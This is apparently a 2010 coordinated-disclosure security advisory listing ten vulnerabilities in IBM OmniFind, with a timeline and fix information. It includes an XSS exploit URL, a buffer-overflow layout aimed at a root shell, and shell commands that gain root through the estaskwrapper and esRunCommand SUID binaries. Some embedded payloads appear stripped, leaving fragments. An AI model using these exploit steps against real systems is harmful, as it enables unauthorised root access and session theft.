Some seemingly benign web-site

============================================ ||| Security Advisory ||| ||| CVE-2010-3890 (CVE candidate) ||| ||| CVE-2010-3891 (CVE candidate) ||| ||| CVE-2010-3892 (CVE candidate) ||| ||| CVE-2010-3893 (CVE candidate) ||| ||| CVE-2010-3894 (CVE candidate) ||| ||| CVE-2010-3895 (CVE candidate) ||| ||| CVE-2010-3896 (CVE candidate) ||| ||| CVE-2010-3897 (CVE candidate) ||| ||| CVE-2010-3898 (CVE candidate) ||| ||| CVE-2010-3899 (CVE candidate) ||| ============================================ IBM OmniFind several issues =========================== Date released: 11/2010 Date reported: 04/2009 by Fatih Kilic Fraunhofer Institute for Secure Information Technology fatih.kilic@sit.fraunhofer.de http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899 Vendor: IBM Product: IBM OmniFind Enterprise Edition Website: http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/ Vulnerabilities: - Cross-Site-Scripting (XSS) - Cross-Site-Request-Forgery (XSRF) - Session fixation - Session impersonation - Remote buffer overflow - Privilege escalation in two applications - Missing authentication in configuration panel - Admin password is delivered in plaintext inside the server response - Cookies are set for root path, not application path - Crawler endless loop +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Background: Quoting http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/: | IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters through knowledge driven search. | | It’s designed to drive users to the knowledge they seek and enhance the visibility of content and context of your organization's unstructured information. | | * Dynamic - delivers complete dynamic facet capabilities, type-ahead search, real-time content alerting, is reactive to search-led content exploration | * Tailorable - delivers business adjustable relevancy and UIMA standardization for entity identification and tuned semantic searching | * Supportable - delivers search on 20+ platform, connects to 30+ repositories | * Secure - delivers enforced security across content repositories | * Scalable - lucene-based index for enterprise level scalability +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Overview: +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Technical details: * Cross-Site-Scripting (XSS) (CVE-2010-3890) The GET parameter »command« used inside the administration interface is embedded directly into the HTML source without any input validation or output sanitization. Using this parameter the attacker can inject arbitrary Javascript code which will be run in the session context of other users. As session credentials are stored within cookies, an attacker can steal the cookie information and impersonate (CVE-2010-3893) the session and control the web application within the browser context of the victim. Exploit to show cookies: http://omnifind-host/ESAdmin/collection.do?command= * Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891) The forms in the administrator interface are not protected against XSRF. The attacker can do any action in the context of the victim. An example attack scenario could be: The attacker creates a malicious website with a prepared form to add a new user, which will be submitted on load. Exploit to add an admin user: Some seemingly benign web-site Solution: Fixed in release v9.1 of Omnifind. * Session fixation (CVE-2010-3892) The login form of the administrator interface is vulnerable to session fixation attacks. And attacker can use a prepared website or a XSS vulnerability (CVE-2010-3890) to change session ID (SID) of the login form. The SID have to be generated by the server. An attacker can visit the login interface and take the generated value and use this for the attack. After a valid authentication of the victim with the attacker SID, the attacker can do any action in the context of the administrator. * Session impersonation (CVE-2010-3893) The session ID (SID) is the only form of user authentication after the login and it is not bound to an IP address. By reading the cookies of the victim, e.g. using an XSS attack (CVE-2010-3890), the whole session can be hijacked and the attacker can do any action in the context of the administrator from any computer that can reach the administrator interface. * Remote buffer overflow (CVE-2010-3894) The administration interface has a login form with an username- and a passwordfield. Entering a valid username (default value is »esadmin«) and a very long string into the password field a buffer overflow is triggered. The function Java_com_ibm_es_oss_CryptionNative_ESEncrypt() defined in the file /opt/IBM/es/lib/libffq.cryptionjni.so is copying the password value to a fixed size buffer of 2048 bytes. There are two attack points to exploit this buffer overflow. The first attack is based on the following buffer combination password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes) The inserted value for »firstattackpoint« will be used in the registers EAX and EDI. These registers are used to write data into. This means you can insert any arbitrary address, where you want to write to. The second attack is overwriting the saved return address and has the following layout. password = 2080 bytes + firstattackpoint EAX+EDI (4 bytes) + 480 bytes + EDX (4 bytes) + EAX (4 bytes) + EIP (4 bytes) To reach the return to your overwritten instruction pointer, you have to insert a valid writeable address as firstattackpoint. This second attack has some restrictions, you can only use printable ASCII values. Non printable characters will be removed from the input string. This is no real barrier, since the code is big enough to have many jmp/call addresses, which have printable ASCII values in their addresses. During the overwrite the register ESI is pointing to your input, so you could use a call *%esi to jump to your ASCII filtered shellcode. During the first attackpoint your input is unfiltered, you can insert arbitrary values. If you combine both attacks together, you can exploit it remotely and get a (root) shell. Default running user is root :) * Privilege escalation in two applications (CVE-2010-3895) Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«. ------------------------------------------------------------------------- -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper ------------------------------------------------------------------------- »esRunCommand« takes one argument and runs it as root. See example below. ------------------------------------------------------------------------- -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id OUTPUT: cmd is id id uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users) ------------------------------------------------------------------------- The application »estaskwrapper« is meant to start the application »estasklight«. The pseudo c code looks like this: ------------------------------------------------------------------------- main() { int auth = 0; ... if (argv[1] == "estasklight") { auth = 1; ... path = getenv("ES_LIBRARY_PATH"); if (path) { setenv("LD_LIBRARY_PATH", path); setenv("LIBPATH", path); ... if (auth) { execvp ("estasklight", args); } ... } ... } ... } ------------------------------------------------------------------------- Explanation of the code: »argv[1]« is the first command line argument, that is compared with the string »estasklight«. If it is equal the »auth« flag is set. If the user has the environment variable »ES_LIBRARY_PATH« set, the value is copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«. If the »auth« flag is set, the application »estasklight« is executed. Exploit for running /bin/sh ------------------------------------------------------------------------- joemueller@XXX:~> cp /bin/sh ~/bin/estasklight joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight XXX:~# id uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users) ------------------------------------------------------------------------- * Missing authentication in configuration panel (CVE-2010-3896) All pages below the the path »http://omnifind-host/ESSearchApplication/« are reachable without any authentication. The server configurations page is located inside this directory at »http://omnifind-host/ESSearchApplication/palette.do«. An attacker can change the server configuration without authenticating himself against the application. * Admin password is delivered in plaintext inside the server response (CVE-2010-3897) The administrator password is embedded as value inside the HTML form at »http://omnifind-host/ESSearchApplication/palette.do« and is transmitted in plaintext over HTTP. An attacker with access to this page, for example obtained by another bug like »missing authentication« (CVE-2010-3896) or »session impersonation« (CVE-2010-3893), can use this password as a backdoor to the system. * Cookies are set for root path, not application path (CVE-2010-3898) The cookies are not restricted to the »ESAdmin« path, they are set for the domain root path. Every page inside the same domain, even from other directories, can access the administrator cookies and steal the session ID, which are used for authentication. * Crawler endless loop (CVE-2010-3899) The crawler has no recursion depth limit. A site with dynamic parameter manipulation can cause an endless loop. This loop will block the crawler thread and use permanent server resources. Too many blocks can lead to a denial of service. The same site will be indexed more times and the search results will display the same site many times. This can be abused for spamming the search results. Exploit to test the endless loop: /* loop.php */ click me'; ?> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Timeline: * 04/2009: Vulnerability reported to IBM * 05/2009: Response from IBM with a timeline of security updates * 07/2010: Coordinating public release of advisory * 11/2010: Public release of advisory +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Solution: A fix for the buffer overflow (CVE-2010-3894) was provided in Omnifind v8.5 Fixpack 6: https://www-304.ibm.com/jct01003c/support/docview.wss?rs=3278&context=SS5SQ7&uid=swg24027159&loc=en_US&cs=utf-8&lang=en Cross-Site-Scripting (CVE-2010-3890) and Privilege escalation in two applications (CVE-2010-3895) are fixed in release v9.1 of Omnifind. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Credits: - Fatih Kilic, Fraunhofer SIT (discovery)